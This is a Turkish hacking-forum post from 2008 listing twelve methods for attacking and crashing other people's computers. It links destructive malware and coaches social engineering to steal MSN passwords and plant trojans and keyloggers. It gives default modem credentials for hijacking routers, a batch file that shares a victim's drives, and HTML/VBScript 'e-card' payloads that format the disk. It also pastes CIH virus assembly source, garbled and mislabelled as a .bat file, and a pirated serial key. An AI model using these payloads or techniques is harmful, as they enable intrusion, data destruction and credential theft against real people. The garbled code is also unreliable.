• Yeni mesajlar

Menü

Giriş yap

---

Navigasyon

Uygulamayı yükle

Yükle

Daha fazla seçenek

Gündüz modu

Bize ulaşın

Kapat Menü

• TurkHackTeam Under Ground
• Bilgisayar Güvenliği

Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz..
Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.

Pc Hack ve Çökertme Yöntemleri

• Konbuyu başlatan haxe
• Başlangıç tarihi 30 Tem 2008

H

haxe

Üye

30 Tem 2008

166

3

• 30 Tem 2008

• #1

1.Yöntem Good Bye Virüsü

Link kesinlikle sağlam virüsü norton avast yakalayamıyor ancak kaspersky tabiki yakalıyor işinize yarar diye bırakıyorum kolay gelsin
1-Masaüstü öğeleri yok olur.
2-Windows kilitlenir.
3-Arka planda müzik çalar.
4-Hızlı format atar.
5-Windows birdaha açılmaz.
6-Tüm Windows ailesine uyumludur
https://tik.lat/WxiSZ

Ama biraz sakat is kendiniz acmayin derim. Acarsaniz pcnizi unutun lütfen kurbana yollayin.Ve mahsum kardeslerimize yapmaylaim gick oldugunuz kisiye yollayin

2.Yöntem Hack Taktiklerini Öğrenerek

arkadaslar simdi size vereceğim hack teknikleri komik gelebilir ama gerçekten işe yarıyor çünkü teknikler dekiler komik olmasına rağmen mantıklı bu tekniklerle en az 20 mail hack yapmısımdır
msn adresi isteyenlere
eminim çok basınıza geliyodur bazıları sende kız msn i varmı varsa göndersene gibi bir sürü şeyler söylüyolar bunlar sizden gelen her türlü dosyayı almaya hazır insanlar genelde rar dosyaları yollarsanız daha etkili oluyor. dosya ne olursa olsun %50 si kabul eder içeriğine bakmaksızın acar bölelerine önceden çaktırmamak için gercekten msn adresi yollarsınız word e yazıp rar içinde sonrada trojen keylogger gibi şeyleri yollarsınız emin olun kabul edip açıcaktır yada direk pc ye zarar vermek istiyosanız böyle program birüs vs. vs. seler sitemizde zaten mevcut.bu tekniği yicek kişiler msn den hack bilmez tek niyeti kızlarla konusup geyikyapmak istiyen kişilerdir

şifre isteme tekniği
arkadaslar en komik teknikte budur gerekenler tatlı dil ikna edicilik inandırıcılık vs. vs. ve ayrıca kibarlık bu yöntem genelde kızlarda işe yarar mesela bir kıza diyeceksiniz hotmailin ingilizce türkçe yapabilirim yada sana msn spaces açabilirim msn ini hackerlardan koruyabilirim gizli sorunu bulunmaması için değiştirebilirim vs. vs. şeylerle karsıdakini kandırıp onun msn ini rahatla çalabiliriz ama hemen ilk konusmada bunları derseniz tabiki şifre vermez

fake attığını söyleme
arkadaslar hazır fakeler sitemizde mevcut onlardan birini atıosunuz ve iyi bir bahane uydurun orası size kalmıs karsıdakine bunu haber veriosunuz mesela msn in güvenli olması için oda oraya şifresini girer size gelir

arkadaslar unutmayın bunların olması için karsıdakinin çok amatör olması lazım proflarda denerseniz gülerler

3.Yöntem Ağdaki Pcyi Kapatma

PC Hack sayılmaz aslına.
karşıdaki pc yi kapatmaya yeniden başlatmaya yarıyor.

Ancak cafe kontrol olan pc lerde işe yaramaz.

çok tantana yaptım olayı anlatayım

BAŞLAT>>ÇALIŞTIR>>>>CMD yaz>>>ENTER>>MSDOS EKRANINDA SHUTDOWN YAZIYORUM>>>>ARDINDAN SHUTDOWN -i yazıyoruz>>>CIKAN EKRANDAN GÖZ AT DİYİP BİR PC SEÇECEN VE AĞDADİ PCYİ KAPATACAN

4.Yöntem Adsl Modem Hack


● нα¢кє∂ ву ∂σğυкαη●

ADSL Modem Hack

Bu yazimizda Adsl modemlerin default şifrelerinden yararlanarak Modem e girip Karşı tarafın bağlantısını kesmeyi ogrenecegiz oncelikle

Angry ip Scanner https://tik.lat/JnMkC ( https://tik.lat/bcv9l )


İp Tools https://tik.lat/T59DP ( https://tik.lat/BkB1Y )

Program Lisansli oldugu icin Serial istiyor :
Name: Condor-TR
Serials: 20316323C8E4C173F7A705EA8C9A4C24BE98ECFA346291285B 4616806D939D966BCF1BC22FF7F2626CB88A72C4B33F03C4CF E60BCA6ECF572DB4DAA1A16EAB1591F1F92BA62DC77096E79F 175B8582BA
Programlari Internet den indirip bilgisayarımıza yüklüyoruz ve İp tools programını aciyoruz Options a girip Port
List bölümüne tıklıyoruz ve sadece 21 ve 23 portlarını seçip Ok diyoruz.Sonra Tools dan Port Scanner a giriyoruz
Baslangic ( From Addr ) ipsi ve bitis ( To Addr ) ipsine tarayacagimiz ip yi yaziyoruz ornegin baslangic -> 81.215.*.1
bitiş -> 81.215.*.255 ve Start Diyoruz

Eger boyle bir sonuc alirsak modem e girebiliriz demektir tabi Modem in sifresi degişmemişise.

Address : 81.215.*.1
Name : dsl.static81215231100.ttnet.net.tr (.TR | Turkey)
Ping .... Ok, Time : 43
Port 21 ... Ok !
Port 23 ... Ok !

Yani bu demek oluyor ki makinanin 21 ve 23. portlari aciktir.

Evet simdi ip yi kopyaliyoruz ve Tools dan Telnet e geciyoruz.

Host : tarama sonunda cikan ip numarasini yaziyoruz

Port : Portuda 23 yapiyoruz 23. Port modem portudur

Start diyoruz

Ve Modem in giris menusu onumuze geliyor bakiyoruz Modem in markasi ne

Diyelim Ki Modem Titanium

User : Admin
Password : Admin yazip giriyoruz
eger girerse bundan sonrasi cok kolay eger girmezse tekrar baska bir Ip taratip ayni islemleri yapiyoruz

Asagidada ADSL Modemlerin Default ( Ilk alindiginda firma tarafindan koyulan sifre ) lerini verdim işinize yarayacaktir.
Apache user : setup veya root Pass : root
Asus user : admin pass : admin
Aztech user : admin pass : admin
Billion Bipac user : admin pass : password
Cnet user : admin pass : e***router
Corecess 3112 usb user : admin pass : corecess3113
Corecess 3113 eth user : admin pass : corecess3113
Dibeg 108 user : dare pass : boş
D-Link user : admin pass : admin
Datron ETHERNET user : admin pass : admin
Datron USB user : admin pass : admin
Link SYS user : admin pass : admin
USB Robotics user : admin pass : admin
Dost GVC user : dost pass : dost
Eicon Diva user : boş pass : boş
Geek user : admin pass : e***router
hicomm user : admin pass : e***router
Inca user : admin pass : e***router
Loopcom user : admin pass : e***router
paradigm user : admin pass : e***router
Mercury ADSL user : boş pass : boş
Origo user : admin pass : kont2004
pikatel user : DSL pass : DSL
Speedcom user : admin pass : conexant
Tecom user : root pass : root
Zoom X Serisi modem user : admin pass : zoomadsl
ZyXEL user : admin pass : 1234


Evet Port tarattik Modem e girdik
Şimdi yapacagimiz ise Angry Ip scanner ı calistirip Girdigimiz Modemin Ip sini yazip ve Start Demek
ve ip numarasi biraz asagida tekrar karsimiza cikiyor ip ye sag tiklayip Open Computer > Ftp diyoruz
Bize kullanici adi ve sifre soruyor Modem e girerken yazdigimiz sifreyi giriyoruz Biz Titanium a girdigimiz icin
Kullanıcı adı : Admin Şifre : Admin diyip giriyoruz buradaki dosyalari silerseniz karsi tarafin baglantisi kesilir
Ayni zamanda Modemin Control Paneline girebilirsiniz internet explorer ı acarak ip numarasini yaziyoruz enter a basiyoruz
kullanici adi ve sifre soruyor ayni sekilde modem ve ftp ye baglanirken girdigimiz sifreyi yaziyoruz ve butun istatistikleri goruyoruz
Seceneklerden Admin > USer Config diyerek Sifreyide degistirebilirsiniz.

Sizde ayni sekilde lenmemek icin internet explorer a ip numaranizi yazin sifrenizi girin ve modeminizin sifresini degistirin.

5.Yöntem Karşı Pcyi Paylaşıma Açma

arkadaslar karsı pcye girdiğinizde genellikle c ve d paylasıma acık değildir. bu yüzden fazla bir sey yapamazsınız c ve d yi acmak için su altta yazılanları alın not defterine yapıstırn ve uzantısı txt'dir.bunu .bat cevirelim.antivirüsler bunu trojen olarak algılayabilir bunun için zipleyin öle yollayın..

net share hacker=c:\ /unlimited /remark:"RockStar"
net share hacker=d:\ /unlimited /remark:"RockStar"

6.Yöntem Uzak Masüstü

uzak masaustu pc girme programi

https://tik.lat/OW0oZ fazla soze gerk yok herşey açikça verilmiş

7.Yöntem Essential Net Tools

Çoğu yerde Msn Hack lemek için saçma programlar dağıtılır ama bunların hiçbiri bir yöntem değil.Şimdi size bir msn in nasıl hacklendiğini anlatacağım.İlk önce
Essential Net Tools programını yükleyin.

https://tik.lat/slDuP


Daha sonra hacklemek istedğiniz kişiye msn den bir konuşma açın.Herhangi bir dosya yollayın(bunu kurbana yedirmenin bir çok yolu var) dosya hertürlü şey olabilir.Dosya yollama süresi ortalardayken başlat/çalıştır a tıklayın.CMD yazın entera basın.Orada açılan dos ekranına netstat -n yazın bunu yazınca sonunda ESTABLISHED yazan ıp kurbanın ıp si oluyor.Ama bu işlemi yaparken başka hiçbir msn konuşması açmayın,internet sayfası ve programlar dahil bunların hiçbirini açık tutmayın.Eğer açık tutarsanız hedefi şaşırır yanlış ıp leri öğrenirsiniz.Ip yi aldıktan sonra Essential Net Tools u açın.Yandaki NBScan yerine tıklayın.Starting IP Adress yerine ıp yi yazın.Ama diğelim ki ıp
85.0.0.5:1896.Burada çift noktalı yerden sonraki herşeyi silin.Yani demin örnekteki ıpyi böyle yazın 85.0.0.5 hatta daha iyi sonuçlar elde etmek istiyorsanız sondaki rakamı 1 yapın.Önü bununla başlayan 255 tane IP arar.Ip yi yazdıktan sonra START tuşuna basın.Bu ıp de olan bilgisayarı bulacaktır.Yukarıda sonuç belirdiğinde üzerine bir kez tıklayın daha sağ tuşla tıklaYasak Kelime open computerı tıklayın.Eğer parola sorarsa PWLMAKER programını kullanarak parola tahminleri üretebilirseniz.Ama parola değilde bir windows gezgini penceresi açıldıysa adamın bilgisayarına girdiniz demektir.Burada istediğinizi silebilir istediğinizi kendi bilgisayarınıza kopyalayabilirsiniz.Msn parolası çalmak için yapacağınız şey keykeylite gibi bir keylogger indirmek.

8.Yöntem Resim ile Pc Kapat

Resmi Actırırsan Pc KApanıyor [GülmekTen ÖleCeksınız] Virus Programına YaKAlanmaZ

Arkadaşlar bunu birine atın karşıki taraf winrar ın icindeki resmi acınca pc si kapanıyor!..

https://tik.lat/xdhcT


Bu ise karşıdakinin mouse unu kaybediyor!..

https://tik.lat/pRs6a

9.Yöntem Mail Yoluyla Format

WİNDOWS98 için bu kodlar ^^XP^^ için olanı aşşağıdaaaa
Kod:
<html>
<head>
****** **********="Content-Type" *********"text/html; charset=iso-8859-1">
<title>Size E-Kart Gönderildi!</title>
</head>
<body>
******** language="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat",

True)
a.WriteLine("format c: /autotest /u /q")
a.Close
</script>
<p>Deminki çıkan hataya "HAYIR" dediyseniz <a
href="javascript:reload()">Uzgünüm e-kartınız çalışmayacaktır.</p>
</body>
</html>

.................................................. ....................



<html>
<head>
****** **********="Content-Type" *********"text/html; charset=iso-8859-1">
<title>Aşkından Sevgilerle</title>
</head>
<body>
******** language="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:c:\windows\system32\autoexec. nt", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
</script>
<p>Giriste ac1lan uyariya "HAYIR" dediyseniz <a
href="javascript:reload()">Malesef e-kart 1n1z cal1smayacakt1r.</p>
</body>
</html>



Bu Kodu *.vbs Veya *.html Olarak Kaydedebilirsiniz!
Bunu sakın açmayın (yoksa siz kendi kendinize format atarsınız )
Sadece kurbana atın ve o açsın

BEn denedim vallaa arkadaşlar yeni bitirdim windows u kurmasını )

10.Yöntem .bat Uzantılı Dosyayla

önce not pad i açıp içine bu kodu yazıyoruz

/timersecure 0 0 //mkdir $mid(c:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)

daha sonra farklı kaydet diyoruz ve ismini örneğin oyun.bat diyoruz sizin yaratıcılığınıza kaldı.
yolladığınız bilgisayar açar açmaz çöküyor

11.Yöntem Winamp İle

Karşı pc'yi çökertme (programsız)winamp ile

arkadaşlar öncelikle şunu belirteyim bu kesinlikle sizi teşvik etmek için değildir. yapmanız çok tehlikelidir. ben bunu sırf kötü niyetli kişilere karşı kullanmanızı öneririm.
önce winamp ta bi müzik açın alt+3 yapın ve adını değiştirin. oraya aynı harfi en az 1000-2000 kere tuşlayın.Basılı tutun ne çok basarsanız o kadar garanti olur. bu dosyayı msn'den gönderin adam açınca bummm. gönderdikten sonra hemen silmenizi öneririm çünkü i hata yüzünden bilgisayarınız uçabilir. biliyorum 2000 harf size çok geldi ama unutmayın pc çökertiyorsunuz...


12.Yöntem Anakart Yakma

Bir not defteri açın. Aşşağıdaki kodları kopyala-yapıştır ve .bat formatında kaydedin...Kendi bilgisayrınızda kesinlikle açmayın !!!

Kod:
************************************************** **************************; * The Virus Program Information *;************************************************ ** **************************; **; * Designer : CIH Original Place : TTIT of Taiwan *; * Create Date : 04/26/1998 Now Version : 1.2 *; * Modification Time : 05/21/1998*; * *;*=============================================== == =========================*; * Modification History *;*=============================================== == =========================*; * v1.0 1. Create the Virus Program. *; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *; * 04/26/1998 3. Virus Code doesn't Reload into System.*; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *; * 6. When System Opens Existing PE File, the File will be *; * Infected, and the File doesn't be Reinfected.*; * 7. It is also Infected, even the File is Read-Only. *; * 8. When the File is Infected, the Modification Date and Time *; * of the File also don't be Changed. *; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *; * Previous FileSystemApiHook, it will Call the Function *; * that the IFS Manager Would Normally Call to Implement *; * this Particular I/O Request. *; * 10. The Virus Size is only 656 Bytes. *;*=============================================== == =========================*; * v1.1 1. Especially, the File that be Infected will not Increase *; * it's Size... ^__^ *; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *; * When Exception Error Occurs, Our OS System should be in *; * Windows NT. So My Cute Virus will not Continue to Run, *; * it will Jmup to Original Application to Run. *; * 3. Use Better Algorithm, Reduce Virus Code Size. *; * 4. The Virus "Basic" Size is only 796 Bytes. *;*=============================================== == =========================*; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *; * 2. Modify the Bug of v1.1 *; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *;************************************************ ** **************************.586P;****************** ******************************** **************************; * Original PE Executable File(Don't Modify this Section)*;**************************************** ********** **************************OriginalAppEXE SEGMENTFileHeader:db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000hdb 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000hdb 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000hdb 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdhdb 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068hdb 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072hdb 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fhdb 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06ehdb 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020hdb 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ahdb 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000hdb 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001hdb 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000hdb 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000hdb 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000hdb 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000hdb 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000hdb 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000hdb 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000hdb 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000hdb 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000hdb 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdb 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000hdd 00000000h, VirusSizeOriginalAppEXE ENDS;********************************************* ***** **************************; * My Virus Game*;******************************************** ****** **************************; ************************************************** *******; * Constant Define *; ************************************************** *******TRUE = 1FALSE = 0DEBUG = TRUEMajorVirusVersion = 1MinorVirusVersion = 2VirusVersion = MajorVirusVersion*10h+MinorVirusVersionIF DEBUGFirstKillHardDiskNumber = 81hHookExceptionNumber = 05hELSEFirstKillHardDiskNumber = 80hHookExceptionNumber = 03hENDIFFileNameBufferSize = 7fh; ************************************************** *******VirusGame SEGMENTASSUME CS:VirusGame, DS:VirusGame, SS:VirusGameASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame; ************************************************** *******; * Ring3 Virus Game Initial Program *; ************************************************** *******MyVirusStartush ebp; *************************************; * Let's Modify Structured Exception *; * Handing, Prevent Exception Error *; * Occurrence, Especially in NT. *; *************************************lea eax, [esp-04h*2]xor ebx, ebxxchg eax, fs:[ebx]call [at]0[at]0op ebxlea ecx, StopToRunVirusCode-[at]0[ebx]push ecxpush eax; *************************************; * Let's Modify *; * IDT(Interrupt Descriptor Table) *; * to Get Ring0 Privilege... *; *************************************push eax ;sidt [esp-02h] ; Get IDT Base Addresspop ebx ;add ebx, HookExceptionNumber*08h+04h ; ZF = 0climov ebp, [ebx] ; Get Exception Basemov bp, [ebx-04h] ; Entry Pointlea esi, MyExceptionHook-[at]1[ecx]push esimov [ebx-04h], si ;shr esi, 16 ; Modify Exceptionmov [ebx+02h], si ; Entry Point Addresspop esi; *************************************; * Generate Exception to Get Ring0 *; *************************************int HookExceptionNumber ; GenerateExceptionReturnAddressOfEndException = $; *************************************; * Merge All Virus Code Section *; *************************************push esimov esi, eaxLoopOfMergeAllVirusCodeSection:mov ecx, [eax-04h]rep movsbsub eax, 08hmov esi, [eax]or esi, esijz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1jmp LoopOfMergeAllVirusCodeSectionQuitLoopOfMergeAllVi rusCodeSectionop esi; *************************************; * Generate Exception Again *; *************************************int HookExceptionNumber ; GenerateException Again; *************************************; * Let's Restore *; * Structured Exception Handing *; *************************************ReadyRestoreS E:stixor ebx, ebxjmp RestoreSE; *************************************; * When Exception Error Occurs, *; * Our OS System should be in NT. *; * So My Cute Virus will not *; * Continue to Run, it Jmups to *; * Original Application to Run. *; *************************************StopToRunViru sCode:[at]1 = StopToRunVirusCodexor ebx, ebxmov eax, fs:[ebx]mov esp, [eax]RestoreSEop dword ptr fs:[ebx]pop eax; *************************************; * Return Original App to Execute *; *************************************pop ebppush 00401000h ; Push OriginalOriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stackret ; Return to Original App Entry Point; ************************************************** *******; * Ring0 Virus Game Initial Program *; ************************************************** *******MyExceptionHook:[at]2 = MyExceptionHookjz InstallMyFileSystemApiHook; *************************************; * Do My Virus Exist in System !? *; *************************************mov ecx, dr0jecxz AllocateSystemMemoryPageadd dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException; *************************************; * Return to Ring3 Initial Program *; *************************************ExitRing0Init :mov [ebx-04h], bp ;shr ebp, 16 ; Restore Exceptionmov [ebx+02h], bp ;iretd; *************************************; * Allocate SystemMemory Page to Use *; *************************************AllocateSyste mMemoryPage:mov dr0, ebx ; Set the Mark of My Virus Exist in Systempush 00000000fh ;push ecx ;push 0ffffffffh ;push ecx ;push ecx ;push ecx ;push 000000001h ;push 000000002h ;int 20h ; VMMCALL _PageAllocate_PageAllocate = $ ;dd 00010053h ; Use EAX, ECX, EDX, and flagsadd esp, 08h*04hxchg edi, eax ; EDI = SystemMemory Start Addresslea eax, MyVirusStart-[at]2[esi]iretd ; Return to Ring3 Initial Program; *************************************; * Install My File System Api Hook *; *************************************InstallMyFile SystemApiHook:lea eax, FileSystemApiHook-[at]6[edi]push eax ;int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHookIFSMgr_InstallFileS ystemApiHook = $ ;dd 00400067h ; Use EAX, ECX, EDX, and flagsmov dr0, eax ; Save OldFileSystemApiHook Addresspop eax ; EAX = FileSystemApiHook Address; Save Old IFSMgr_InstallFileSystemApiHook Entry Pointmov ecx, IFSMgr_InstallFileSystemApiHook-[at]2[esi]mov edx, [ecx]mov OldInstallFileSystemApiHook-[at]3[eax], edx; Modify IFSMgr_InstallFileSystemApiHook Entry Pointlea eax, InstallFileSystemApiHook-[at]3[eax]mov [ecx], eaxclijmp ExitRing0Init; ************************************************** *******; * Code Size of Merge Virus Code Section *; ************************************************** *******CodeSizeOfMergeVirusCodeSection = offset $; ************************************************** *******; * IFSMgr_InstallFileSystemApiHook *; ************************************************** *******InstallFileSystemApiHookush ebxcall [at]4 ;[at]4: ;pop ebx ; mov ebx, offset FileSystemApiHookadd ebx, FileSystemApiHook-[at]4 ;push ebxint 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHookIFSMgr_RemoveFileSys temApiHook = $dd 00400068h ; Use EAX, ECX, EDX, and flagspop eax; Call Original IFSMgr_InstallFileSystemApiHook; to Link Client FileSystemApiHook 0Dpush dword ptr [esp+8]call OldInstallFileSystemApiHook-[at]3[ebx]pop ecxpush eax; Call Original IFSMgr_InstallFileSystemApiHook; to Link My FileSystemApiHookpush ebxcall OldInstallFileSystemApiHook-[at]3[ebx]pop ecxmov dr0, eax ; Adjust OldFileSystemApiHook Addresspop eaxpop ebxret; ************************************************** *******; * Static Data *; ************************************************** *******OldInstallFileSystemApiHook dd ?; ************************************************** *******; * IFSMgr_FileSystemHook *; ************************************************** *******; *************************************; * IFSMgr_FileSystemHook Entry Point *; *************************************FileSystemApi Hook:[at]3 = FileSystemApiHookpushadcall [at]5 ;[at]5: ;pop esi ; mov esi, offsetVirusGameDataStartAddressadd esi, VirusGameDataStartAddress-[at]5; *************************************; * Is OnBusy !? *; *************************************test byte ptr (OnBusy-[at]6)[esi], 01h ; if ( OnBusy )jnz pIFSFunc ; Yasak Kelime o pIFSFunc; *************************************; * Is OpenFile !? *; *************************************; if ( NotOpenFile ); Yasak Kelime o prevhooklea ebx, [esp+20h+04h+04h]cmp dword ptr [ebx], 00000024hjne prevhook; *************************************; * Enable OnBusy *; *************************************inc byte ptr (OnBusy-[at]6)[esi] ; Enable OnBusy; *************************************; * Get FilePath's DriveNumber, *; * then Set the DriveName to *; * FileNameBuffer. *; *************************************; * Ex. If DriveNumber is 03h, *; * DriveName is 'C:'. *; *************************************; mov esi, offset FileNameBufferadd esi, FileNameBuffer-[at]6push esimov al, [ebx+04h]cmp al, 0ffhje CallUniToBCSPathadd al, 40hmov ah, ':'mov [esi], eaxinc esiinc esi; *************************************; * UniToBCSPath *; *************************************; * This Service Converts *; * a Canonicalized Unicode Pathname *; * to a Normal Pathname in the *; * Specified BCS Character Set. *; *************************************CallUniToBCSP athush 00000000hpush FileNameBufferSizemov ebx, [ebx+10h]mov eax, [ebx+0ch]add eax, 04hpush eaxpush esiint 20h ; VXDCall UniToBCSPathUniToBCSPath = $dd 00400041hadd esp, 04h*04h; *************************************; * Is FileName '.EXE' !? *; *************************************; cmp [esi+eax-04h], '.EXE'cmp [esi+eax-04h], 'EXE.'pop esijne DisableOnBusyIF DEBUG; *************************************; * Only for Debug *; *************************************; cmp [esi+eax-06h], 'FUCK'cmp [esi+eax-06h], 'KCUF'jne DisableOnBusyENDIF; *************************************; * Is Open Existing File !? *; *************************************; if ( NotOpenExistingFile ); Yasak Kelime o DisableOnBusycmp word ptr [ebx+18h], 01hjne DisableOnBusy; *************************************; * Get Attributes of the File *; *************************************mov ax, 4300hint 20h ; VXDCall IFSMgr_Ring0_FileIOIFSMgr_Ring0_FileIO = $dd 00400032hjc DisableOnBusypush ecx; *************************************; * Get IFSMgr_Ring0_FileIO Address *; *************************************mov edi, dword ptr (IFSMgr_Ring0_FileIO-[at]7)[esi]mov edi, [edi]; *************************************; * Is Read-Only File !? *; *************************************test cl, 01hjz OpenFile; *************************************; * Modify Read-Only File to Write *; *************************************mov ax, 4301hxor ecx, ecxcall edi ; VXDCall IFSMgr_Ring0_FileIO; *************************************; * Open File *; *************************************OpenFile:xor eax, eaxmov ah, 0d5hxor ecx, ecxxor edx, edxinc edxmov ebx, edxinc ebxcall edi ; VXDCall IFSMgr_Ring0_FileIOxchg ebx, eax ; mov ebx, FileHandle; *************************************; * Need to Restore *; * Attributes of the File !? *; *************************************pop ecxpushftest cl, 01hjz IsOpenFileOK; *************************************; * Restore Attributes of the File *; *************************************mov ax, 4301hcall edi ; VXDCall IFSMgr_Ring0_FileIO; *************************************; * Is Open File OK !? *; *************************************IsOpenFileOK: popfjc DisableOnBusy; *************************************; * Open File Already Succeed. ^__^ *; *************************************push esi ; Push FileNameBuffer Address to Stackpushf ; Now CF = 0, Push Flag to Stackadd esi, DataBuffer-[at]7 ; mov esi, offset DataBuffer; ***************************; * Get OffsetToNewHeader *; ***************************xor eax, eaxmov ah, 0d6h; For Doing Minimal VirusCode's Length,; I Save EAX to EBP.mov ebp, eaxxor ecx, ecxmov cl, 04hxor edx, edxmov dl, 3chcall edi ; VXDCall IFSMgr_Ring0_FileIOmov edx, [esi]; ***************************; * Get 'PE\0' Signature *; * of ImageFileHeader, and *; * Infected Mark. *; ***************************dec edxmov eax, ebpcall edi ; VXDCall IFSMgr_Ring0_FileIO; ***************************; * Is PE !? *; ***************************; * Is the File *; * Already Infected !? *; ***************************; cmp [esi], '\0PE\0'cmp dword ptr [esi], 00455000hjne CloseFile; *************************************; * The File is ^o^ *; * PE(Portable Executable) indeed. *; *************************************; * The File isn't also Infected. *; *************************************; *************************************; * Start to Infect the File *; *************************************; * Registers Use Status Now : *; * *; * EAX = 04h *; * EBX = File Handle *; * ECX = 04h *; * EDX = 'PE\0\0' Signature of *; * ImageFileHeader Pointer's *; * Former Byte. *; * ESI = DataBuffer Address ==> [at]8 *; * EDI = IFSMgr_Ring0_FileIO Address *; * EBP = D600h ==> Read Data in File *; *************************************; * Stack Dump : *; * *; * ESP => ------------------------- *; * | EFLAG(CF=0) | *; * ------------------------- *; * | FileNameBufferPointer | *; * ------------------------- *; * | EDI | *; * ------------------------- *; * | ESI | *; * ------------------------- *; * | EBP | *; * ------------------------- *; * | ESP | *; * ------------------------- *; * | EBX | *; * ------------------------- *; * | EDX | *; * ------------------------- *; * | ECX | *; * ------------------------- *; * | EAX | *; * ------------------------- *; * | Return Address | *; * ------------------------- *; *************************************push ebx ; Save File Handlepush 00h ; Set VirusCodeSectionTableEndMark; ***************************; * Let's Set the *; * Virus' Infected Mark *; ***************************push 01h ; Sizepush edx ; Pointer of Filepush edi ; Address of Buffer; ***************************; * Save ESP Register *; ***************************mov dr1, esp; ***************************; * Let's Set the *; * NewAddressOfEntryPoint *; * ( Only First Set Size ) *; ***************************push eax ; Size; ***************************; * Let's Read *; * Image Header in File *; ***************************mov eax, ebpmov cl, SizeOfImageHeaderToReadadd edx, 07h ; Move EDX to NumberOfSectionscall edi ; VXDCall IFSMgr_Ring0_FileIO; ***************************; * Let's Set the *; * NewAddressOfEntryPoint *; * ( Set Pointer of File, *; * Address of Buffer ) *; ***************************lea eax, (AddressOfEntryPoint-[at][esi]push eax 